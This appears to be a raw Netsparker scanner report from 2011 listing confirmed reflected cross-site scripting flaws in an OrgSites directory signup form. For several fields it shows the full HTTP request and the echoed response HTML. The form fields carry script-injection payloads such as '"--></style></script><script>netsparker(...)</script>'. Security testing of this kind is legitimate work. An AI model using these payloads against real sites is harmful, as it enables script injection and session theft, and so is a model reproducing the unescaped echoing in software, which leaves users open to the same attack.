width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=\'\"--></style></script><script>netsparker(0x0029A4)</script>><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST '"--></style></script><script>alert(0x0029A7)</script>
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0029A7)%3c%2fscript%3e&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:54:36 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="\'\"--></style></script><script>netsparker(0x0029A7)</script>"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST '"--></style></script><script>alert(0x0029A9)</script>
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0029A9)%3c%2fscript%3e&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:54:50 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="\'\"--></style></script><script>netsparker(0x0029A9)</script>"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" 